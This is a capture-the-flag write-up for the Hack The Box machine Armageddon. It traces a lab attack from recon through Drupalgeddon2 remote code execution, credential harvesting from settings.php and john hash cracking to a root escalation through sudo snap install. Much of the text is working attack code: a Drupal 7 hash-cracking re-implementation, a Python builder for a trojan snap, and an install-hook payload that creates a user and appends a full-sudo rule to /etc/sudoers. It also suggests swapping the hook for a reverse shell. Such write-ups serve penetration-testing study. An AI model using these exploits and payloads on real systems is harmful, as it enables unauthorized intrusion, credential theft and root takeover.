
🕵 HTB-Writeup : ARMAGEDDON

Recon

nmap x rustscan

└─$ rustscan -a 10.10.10.233 -b 10000 -- -A -Pn -sV -T5

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

Open 10.10.10.233:22
Open 10.10.10.233:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries  /includes/ /misc/ /modules/ /profiles/ /scripts/  /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt  /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt  /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php  /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/  /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/  /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ /?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

We now know that we are targeting a CentOS box with Drupal installed; the http-generator header already tells us it is Drupal 7. Drupal is a free and open-source web content management system written in PHP.

dirbuster

The dirbuster scan returns many files and directories. Among them is a changelog at http://10.10.10.233/CHANGELOG.txt, which reveals the exact Drupal version.


The box is most likely running Drupal 7.56.

Finding vulnerabilities

Running searchsploit, we find several exploits affecting that version.

└─$ searchsploit drupal 7.5                                
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)        | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)     | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb
-------------------------------------------------------------------------------- ---------------------------------

We don't have an account, so the authenticated Drupalgeddon3 exploits are out and one exploit is left: Drupalgeddon2 (CVE-2018-7600), an unauthenticated remote code execution fixed in Drupal 7.58.

Oh, it sounds like the box name :)

└─$ ruby 44449.rb http://10.10.10.233

armageddon.htb>> whoami
apache

We have a shell, running as the apache user.

Local recon

Listing the listening sockets on the box:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN    

Besides SSH and HTTP, two services are bound to loopback only:
  • SMTP (127.0.0.1:25)
  • MySQL (127.0.0.1:3306), the interesting one for a Drupal install

In the /var/www/html directory we find a .gitignore file. Such files often list the paths of sensitive files the developers did not want in the repository, which makes them a good map for us as well.

armageddon.htb>> cat /var/www/html/.gitignore
# Ignore configuration files that may contain sensitive information.
sites/*/settings*.php

# Ignore paths that contain user-generated content.
sites/*/files
sites/*/private

The interesting file is /var/www/html/sites/default/settings.php: it contains clear-text credentials for the MySQL server.

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

With those credentials we can dump the users table of the drupal database.

armageddon.htb>> mysql --user=drupaluser --password='CQHEy@9M*m23gBVj' -D drupal -e 'select * from users;'

uid	name	pass	mail	theme	signature	signature_format	created	access	login	status	timezone	language	picture	init	data
0						NULL	0	0	0	0	NULL		0		NULL
1	brucetherealadmin	$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt	admin@armageddon.eu		filtered_html	1606998756	1607077194	1607076276	1	Europe/London		0	admin@armageddon.eu	a:1:{s:7:"overlay";i:1;}
3	toto	$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw	alt.du-9lbv0xo@yopmail.com			filtered_html	1661977417	0	0	0	Europe/London		0	alt.du-9lbv0xo@yopmail.com	NULL

We obtain two users and their password hashes ($S$ is the Drupal 7 hash format):

  • brucetherealadmin:$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
  • toto:$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw

Let's try to crack Bruce's hash with john and rockyou:

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)     

We get his password: booboo. The same password is reused for his system account, so we can log in to the website as well as over SSH with brucetherealadmin:booboo.
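To see what john is actually doing with that $S$ hash, here is an added example (not code from the original write-up) that re-implements the Drupal 7 password scheme from includes/password.inc: an 8-character salt, 2^cost rounds of SHA-512 where the cost character indexes Drupal's own base64 alphabet, and the result truncated to 55 characters. It checks candidates from a constructed mini wordlist against the brucetherealadmin hash dumped above; rockyou.txt is the only thing it stands in for.

```python
import hashlib
import math
from typing import Iterable, Optional

# Added example (not from the original write-up): Drupal 7's password hashing
# re-implemented in Python so the $S$ hash dumped from the users table can be
# checked offline, which is what john does under the hood.

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55                 # stored hashes are cut to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30              # cost range Drupal accepts
ALGOS = {"S": "sha512", "H": "md5", "P": "md5"}   # $S$ Drupal 7, $H$/$P$ phpass

# Hash of brucetherealadmin taken from the users table above.
BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def _password_base64_encode(data: bytes) -> str:
    """phpass-style base64: 6 bits per char from little-endian 3-byte groups."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> Optional[str]:
    """Recompute the hash of `password` under a 12-char setting prefix.

    Layout: '$' algo '$' cost-char salt(8), e.g. '$S$DgL2gjv6Z'. The cost
    char's index in ITOA64 is log2 of the iteration count ('D' -> 2^15).
    """
    if len(password) > 512:             # Drupal's DoS guard
        return None
    setting = setting[:12]
    if setting[0] != "$" or setting[2] != "$" or setting[1] not in ALGOS:
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt = setting[4:12].encode()
    if len(salt) != 8:
        return None
    algo, pw = ALGOS[setting[1]], password.encode()
    digest = hashlib.new(algo, salt + pw).digest()
    for _ in range(1 << count_log2):    # 32768 rounds for cost 'D'
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _password_base64_encode(digest)
    if len(output) != 12 + math.ceil(8 * len(digest) / 6):
        return None
    return output[:DRUPAL_HASH_LENGTH]


def drupal7_check(password: str, stored: str) -> bool:
    """True if `password` produces exactly the stored hash."""
    return drupal7_crypt(password, stored) == stored


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches `stored`, or None."""
    for candidate in wordlist:
        if drupal7_check(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    words = ["123456", "password", "bruce", "booboo", "armageddon"]
    print(crack(BRUCE_HASH, words))
```

At 32768 SHA-512 rounds per guess this is slow compared with john's AVX2 code, which is the whole point of the cost parameter; it is still fast enough to confirm a single cracked password or a short list of defaults.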

We can get the user flag!

[brucetherealadmin@armageddon ~]$ cat /home/brucetherealadmin/user.txt 
*************************78ed36c

Path to the privesc

Listing Bruce's sudo privileges shows that he can run snap install as root without a password:

[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
    LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

I first searched exploit-db for a snap privilege escalation.

└─$ searchsploit snapd                  
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)  | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)  | linux/local/46362.py
--------------------------------------------------------------------- ---------------------------------

[brucetherealadmin@armageddon ~]$ snap --version
snap    2.47.1-1.el7
snapd   2.47.1-1.el7

The dirty_sock exploit does not work as it is: it abuses an authentication bypass in the snapd REST API (CVE-2019-7304) that was fixed in snapd 2.37, and this box runs 2.47.1. We don't need the bypass, though. sudo already lets us run snap install as root, so all we need is the trojan snap embedded in the exploit script, written out as a .snap file and installed.

That snap carries an install hook, which snapd runs as root during installation. The hook creates a user dirty_sock (password dirty_sock), tries to add it to the sudo group and appends a sudoers rule granting it full sudo. CentOS has no sudo group (it uses wheel), so the usermod step fails, but the sudoers line alone is enough.

#!/bin/bash

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers
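If you would rather not depend on the blob shipped with the exploit, the same snap can be staged by hand. The following is an added example, not code from the original write-up: a .snap is a squashfs image whose meta/snap.yaml describes the package and whose executable meta/hooks/install runs as root during `snap install`; with --dangerous --devmode, snapd skips the signature and confinement checks. The snap.yaml fields, the temp-directory layout and the mksquashfs flags are my assumptions about the format, not something the original post shows; the hook body is the payload quoted above.

```python
import shutil
import subprocess
import tempfile
from pathlib import Path

# Added example (not from the original write-up): stage the trojan snap by
# hand instead of decoding the base64 blob from the exploit script.
# Assumptions: snap.yaml fields below and the mksquashfs flags are what the
# snap format needs; neither is taken from the original post.

SNAP_YAML = """\
name: dirty-sock
version: '0.1'
summary: trojan snap with a root install hook
description: the install hook adds a sudo-capable user
type: app
confinement: devmode
"""

# Same payload as the dirty_sock hook quoted above (password: dirty_sock).
INSTALL_HOOK = """\
#!/bin/bash
useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers
"""


def build_stage_dir(stage: Path) -> Path:
    """Write meta/snap.yaml and an executable meta/hooks/install; return the hook."""
    hooks = stage / "meta" / "hooks"
    hooks.mkdir(parents=True, exist_ok=True)
    (stage / "meta" / "snap.yaml").write_text(SNAP_YAML)
    hook = hooks / "install"
    hook.write_text(INSTALL_HOOK)
    hook.chmod(0o755)                 # snapd only runs hooks that are executable
    return hook


def stage_in_tempdir() -> Path:
    """Stage into a fresh temporary directory and return the hook path."""
    return build_stage_dir(Path(tempfile.mkdtemp(prefix="dirty-sock-")))


def pack_snap(stage: Path, out: Path) -> Path:
    """Pack the staged tree into a squashfs image (needs squashfs-tools)."""
    if shutil.which("mksquashfs") is None:
        raise RuntimeError("mksquashfs not found; install squashfs-tools")
    subprocess.run(
        ["mksquashfs", str(stage), str(out),
         "-noappend", "-comp", "xz", "-all-root", "-no-xattrs"],
        check=True, stdout=subprocess.DEVNULL,
    )
    return out


if __name__ == "__main__":
    hook = stage_in_tempdir()
    snap = pack_snap(hook.parent.parent.parent, Path("/tmp/exploit.snap"))
    print(snap)
    # then, as brucetherealadmin:
    #   sudo snap install --dangerous --devmode /tmp/exploit.snap
```

`-all-root` matters: snapd is happy with any owner in devmode, but shipping a squashfs owned by your unprivileged uid is a needless tell in the image. The hook is a plain shell script, so swapping the payload for a reverse shell or a setuid copy of bash is a one-line change.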

We can write a simple Python script that decodes the base64 payload from the exploit script and writes it to the file exploit.snap:

import base64

# TROJAN_SNAP blob copied from the dirty_sock exploit script; the long
# base64 string itself is omitted here. The trailing 'A' * 4256 + '=='
# padding is part of the blob as shipped.
SNAP = ('''...'''
        + 'A' * 4256 + '==')

blob = base64.b64decode(SNAP)
with open("exploit.snap", "wb") as f:
    f.write(blob)

Then we can launch a snap install with root privileges.

[brucetherealadmin@armageddon tmp]$ sudo snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed

# checking user presence
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash

Our new user has been created, and its sudoers entry lets us read the root flag!

[brucetherealadmin@armageddon tmp]$ su dirty_sock
Password: dirty_sock

[dirty_sock@armageddon /]$ sudo cat /root/root.txt
*************************70c28a3

Tags

PHP, Password Reuse, Easy, External, Drupal, Penetration Tester Level 1, CVE Exploitation, CVE-2018-7600, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Credentials, A07:2021-Identification And Authentication Failures, Source Code Review, Clear Text Credentials, Authentication, Password Cracking, Sudo Exploitation